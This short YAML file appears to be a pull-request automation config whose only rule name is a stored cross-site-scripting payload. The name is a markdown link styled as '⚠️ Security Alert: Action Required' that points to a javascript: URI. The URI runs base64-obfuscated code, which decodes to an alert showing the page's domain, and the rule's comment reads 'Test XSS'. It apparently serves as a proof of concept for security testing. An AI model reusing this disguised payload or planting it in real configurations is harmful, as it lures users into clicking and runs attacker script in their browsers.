pull_request_rules:
     - name: "[⚠️ Security Alert: Action Required](javascript:eval%28atob%28\"YWxlcnQoIlhTUyBvbjogIiArIGRvY3VtZW50LmRvbWFpbik=\"%29%29)"
       conditions:
         - base=main
       actions:
         comment:
           message: "Test XSS"
